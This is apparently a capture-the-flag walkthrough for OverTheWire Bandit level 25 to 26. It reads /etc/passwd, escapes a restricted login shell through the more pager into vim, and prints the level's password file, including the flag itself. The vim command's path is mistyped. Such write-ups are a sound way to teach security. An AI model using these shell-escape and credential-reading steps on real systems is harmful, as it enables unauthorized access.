### Level 25 --> Level 26

1. Connect to the server 

```bash 
$ ssh -p 2220 bandit25@bandit.labs.overthewire.org
```

2. Try to connect using the sshkey

```bash
$ ssh -i bandit26.sshkey bandit26@localhost

This is a OverTheWire game server. More information on http://www.overthewire.org/wargames
  _                     _ _ _   ___   __
 | |                   | (_) | |__ \ / /
 | |__   __ _ _ __   __| |_| |_   ) / /_
 | '_ \ / _` | '_ \ / _` | | __| / / '_ \
 | |_) | (_| | | | | (_| | | |_ / /| (_) |
 |_.__/ \__,_|_| |_|\__,_|_|\__|____\___/
Connection to bandit.labs.overthewire.org closed.
```

3. Let see if the password will tell us anything.

```bash
$ cat /etc/passwd | grep bandit26
bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
$ cat /usr/bin/showtext
#!/bin/sh
export TERM=linux
more ~/text.txt
exit 0
```

4. Okay lets see if we can trigger the more command to happen so got to resize our window and try using the sshkey provided

```bash
$ ssh bandit26@bandit.labs.overthewire.org -p 2220 -i bandit26.sshkey
```

5. Once the more command has run, press v to enter vim mod and execute the following command

```bash
:e /ect/bandit_pass/bandit26

5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z
```
Flag is 5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z